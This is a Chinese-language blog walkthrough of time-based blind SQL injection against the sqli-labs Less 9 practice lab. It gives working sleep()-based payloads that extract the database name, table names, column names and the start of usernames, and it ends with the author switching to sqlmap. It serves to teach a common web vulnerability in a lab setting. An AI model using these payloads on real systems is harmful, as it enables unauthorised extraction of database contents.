Time-based基于时间的盲注

最新推荐文章于 2024-09-01 13:09:09 发布
最新推荐文章于 2024-09-01 13:09:09 发布
阅读量463 收藏 10
点赞数 9
分类专栏: SQL注入 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141644079
版权

时间盲注和布尔盲注很像,区别就是“参照物”的不同,布尔盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些sql语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合if判断和sleep()函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断,也就是所谓的“时间盲注”,又叫“延时注入”。

这里以sqli-labs靶场的less 9为例:

尝试用hackbar输入/?id=1和/?id=1'和/?id=1",但结果都是

说明这关对所有信息都做了统一输出,换成延时注入

/?id=1' and sleep(10)--+

等待了好几秒,说明sleep()函数被执行了

判断数据库长度:

?id=1' and if(length(database())=x,sleep(15),1)--+

不断变化x的值和时间延迟来确定数据库名长度,得出x=8,即数据库名长度为8

猜测数据库名:

?id=1' and if(ascii(substr(database(),x,1))=y,sleep(15),1)--+

?id=1' and if(substr(database(),x,1)='a',sleep(15),1)--+

这里用burp的重放器试试,先测第一位:

?id=1' and if(substr(database(),1,1)='a',sleep(15),1)--+

后面测试出来第一位是s,第二位是e,第三位是u,猜测是security,当然后续也证明了数据库名是security

猜测数据库security的表名:

先测第一个表的第一个字符,猜测是'e':

?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(15),1)--+

第一个表的第二个字符,猜测是'm':

?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1)='m',sleep(15),1)--+

还是一样在burp的重放器中进行,后续得到第一个表是emails

第二个表的第一个字符,猜测是'r':

?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='r',sleep(15),1)--+

以此类推,得到所有表名:

emails、referers、uagents和users

(一般重要信息都是在users表中,所以一般都将第一个字符猜测成'u')

猜测security数据库中的users表中的列名:

还是老样子,猜测users表中的第一个列的第一个字符:

?id=1' and if (substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(15),1)--+

以此类推,得出列名:

id、username、password

猜测username和password的值:

老样子,猜测username的第一行的第一个字符

?id=1' and if(substr((select username from users limit 0,1), 1,1)='D',sleep(15),1)--+

做到这里做不动了,花了很长时间去跑sqlmap跑出来结果了

南暮思鸢
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql基于时间盲注_MySQL基于时间盲注Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 956
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
python mysql延时注入_Python:SQLMap源码精读之基于时间盲注time-based blind)
weixin_42297665的博客
02-02 606
基于时间盲注(time-basedblind)测试应用是否存在SQL注入漏洞时,经常发现某一潜在的漏洞难以确认。这可能源于多种原因,但主要是因为Web应用未显示任何错误,因而无法检索任何数据。对于这种情况,要想识别漏洞,向数据库注入时间延迟并检查服务器响应是否也已经延迟会很有帮助。时间延迟是一种很强大的技术,Web服务器虽然可以隐藏错误或数据,但必须等待数据库返回结果,因此可用它来确认是否存在...
挖洞经验 | 构造基于时间盲注漏洞(Time-Based SQLi)
南迪叶先森
07-05 516
公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! ** ** 某天,当我参与某个漏洞众测项目中,偶尔发现之前一个从未见过的子域名网站,因此我决定深入测试一下。该网站主界面 是一个登录页面,开放了用户注册功能,所以我就注册了一个账户,最后试出了一个时间盲注来。 在查看该网站过程中,我发现其中还有一个搜索功能,我尝试进行了XSS,但是无效。当时,我根本没想着去测试SQL注入漏洞,因 为我觉得开发人员应该部署了完善的过滤措施,不可能存在注入漏洞。但是,其中的点击按钮引起了我的注意,即当.
09、注入篇--盲注【布尔盲注
WX公众号-小白学安全
04-05 722
文章目录原理利用防范靶场 原理 利用 防范 靶场
基于时间盲注-based time
weixin_44749329的博客
04-08 1356
什么是基于时间盲注 如果说基于boolean的盲注在页面上还可以看到0 or 1的回显的话,那么基于time盲注就什么也看不到了! 但是有个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确定注入! 下面我会通过演示来让大家了解基于时间盲注 首先打开pikachu种的SQL-Inject 中的盲注(base on time) 我们先输入一个单引号,点击查询 这个地方是没有...
SQL注入-时间盲注
WolvenSec的博客
06-03 1931
SQL时间盲注Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
10、注入篇--盲注时间盲注、延时注入】
WX公众号-小白学安全
04-05 1623
文章目录原理利用防范靶场 原理 利用 防范 靶场
Web安全之SQL注入漏洞学习(四)-时间盲注
u012002125的博客
10-03 2139
基于时间延迟注入(Time-based)- 时间盲注 利用sleep()或benchmark()等函数让mysql执行时间变长,通过页面的响应时间来判断条件是否正确。经常与if(expr1,expr2,expr3)语句结合使用,if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。 通俗讲就是当页面不返回查询结果或者是返回空无法判断注入的语句是否成功时,通过注入特定的SQL语句,根据也面对请求的时间反馈来判断是否注入成功。 时间盲注原理介绍
基于时间盲注
2301_77789826的博客
05-08 129
时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。用到的函数为sleep()。
sqli-labs Less-9/10 Blind--Time Based 基于时间盲注
bigblue00的博客
06-17 391
Less-9/10 Blind–Time Based 基于时间盲注 Less-9是单引号闭合,Less-10 是双引号闭合,下面以Less-9为例分析 1、判断页面情况 如论我们输入的语句是否合法,页面的显示信息是固定的,即不会出现查询的信息,也不会出现报错信息。可以尝试基于时间盲注来测试。根据页面响应的时间,来判断输入的信息是否正确。 2、语句构造 常用的是结合if 和sleep语句使用,构造语句如下: if (条件,语句1,语句2):条件成立则执行语句1,否则执行语句2。 length 获取字符串的
sqli-lab教程——Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
luosaierdadi的博客
07-08 146
不管怎么输入,显示总是you are ... 考虑时间盲注,payload ?id=1" and sleep(3) --+ 注意id=1,发现明显延迟,说明注入成功,接下来爆破就完了。这道题的payload构造和第五题的方法一是一样的,一些废话就不多说了,这里就列一下过程,完事儿。爆库payload?id=1" and if(length(database())=4 , sleep(3), 1) --+ 发现当?id=1" and if(length(database())=8 , sleep(3),
mysql-day02
m0_64370841的博客
08-29 2020
【代码】mysql-day02。
Redis基础命令和事务,redis持久化和主从复制
baomingshu的博客
08-31 1072
nosql数据库介绍:解释为 non-relational(非关系型数据库)。在NoSQL 数据库中数据之间是无联系的数据的结构是松散的,可变的。优势:大数据量,高性能,灵活的数据模型,高可用,低成本劣势:(1)无关系,数据之间是无联系的。
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1412
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
您应该使用哪个矢量数据库? 选择最适合您需求的数据库
weixin_41446370的博客
09-01 740
在现实世界中,并非所有数据都能整齐地排列成行和列。在处理复杂的非结构化数据(如图像、视频和自然语言)时尤其如此。矢量数据库是一种以高维矢量形式存储数据的数据库,本质上是代表对象特征或特性的数字列表。每个矢量对应一个独特的实体,如一段文本、图像或视频。但为什么要使用矢量呢?奥妙就在于它能够捕捉语义和相似性。通过将数据表示为向量,我们可以对它们进行数学比较,并确定它们的相似或不相似程度。这使我们能够执行复杂的查询,如 "为我查找与此相似的图片 "或 “检索与此文本语义相关的文档”。
(1)Hilt的基本概念和使用
challenge51all的专栏
08-27 1705
Jetpack Hilt 是一个强大的依赖注入框架,它简化了 Android 应用中的依赖管理,提高了代码的可维护性和可测试性。通过使用注解和模块,开发人员可以轻松地管理应用中的依赖关系,并在不同的组件之间共享和注入依赖。在应用的 Application 类上使用这个注解,告诉 Hilt 这是一个使用 Hilt 进行依赖注入的应用。Jetpack Hilt 是一个用于 Android 的依赖注入框架,它建立在 Dagger 的基础上,旨在简化 Android 应用中的依赖注入过程。
编译原理简介
最新发布
m0_52796585的博客
09-01 604
编译原理是计算机科学中的一个核心领域,它涉及到将高级编程语言编写的源代码转换成机器语言的过程。这个过程对于计算机程序的运行至关重要,因为计算机硬件只能理解机器语言指令。编译原理不仅关注编译器的设计和实现,还涉及语言的语义、语法分析、代码优化等多个方面。
MYSQL数据库初体验
qq_63994746的博客
08-28 1856
面向Windows操作系统简单、易用华为:欧拉阿里:龙蜥腾讯:tencentOS麒麟:(银河麒麟、中标麒麟 – >centos 优麒麟 – > Ubuntu )统信:uos红旗深度:deepin。
policy iteration ADP 和 time-based ADP 的区别
07-16
策略迭代的ADP(Approximate Dynamic Programming,近似动态规划)是一种求解最优策略的方法,有两种常见的变体:策略迭代和时间差异(time-based)ADP。它们之间的区别如下: 1. 策略迭代:策略迭代是一种典型的ADP方法,它通过交替进行策略评估和策略改进来逐步优化策略。在每次迭代中,策略评估使用当前策略来计算状态的价值函数估计,而策略改进则使用价值函数估计来更新策略。策略迭代通常会在达到收敛条件时停止,得到一个最优策略。 2. 时间差异(time-based)ADP:时间差异ADP是一种改进的ADP方法,它通过使用时间差异学习算法来直接更新价值函数的估计。与策略迭代不同,时间差异ADP不需要显式地进行策略评估和改进。它通过与环境交互来收集状态-行动对和对应的奖励,并使用时间差异学习算法(如Q-learning、SARSA等)来更新价值函数估计。时间差异ADP的目标是直接学习最优的价值函数估计,从而得到最优的策略。 总结来说,策略迭代是一种迭代优化策略和价值函数的方法,而时间差异ADP是一种通过直接学习最优价值函数估计来得到最优策略的方法。策略迭代需要明确的策略评估和改进步骤,而时间差异ADP则通过与环境交互来进行直接的学习更新。选择使用哪种方法取决于具体问题的特点和需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值